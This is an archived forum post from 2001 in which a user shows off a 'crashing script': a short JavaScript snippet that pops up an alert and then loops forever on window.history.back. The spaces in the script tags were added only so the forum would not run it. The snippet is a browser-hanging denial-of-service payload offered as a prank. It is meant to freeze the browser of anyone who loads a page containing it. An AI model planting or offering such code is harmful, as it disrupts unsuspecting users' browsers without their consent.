PDA

View Full Version : Check out my new Crashing Script...


TThoRnGen
12th December 2001, 06:33 PM
this took oh say... 10 sec to make

< script >function crash(){
alert ('Crash?');while(true){window.history.back(-1)}}
crash ()< /script >

note:there are spaces inbetween the <'s and the scripts because it would star running if i didnt do this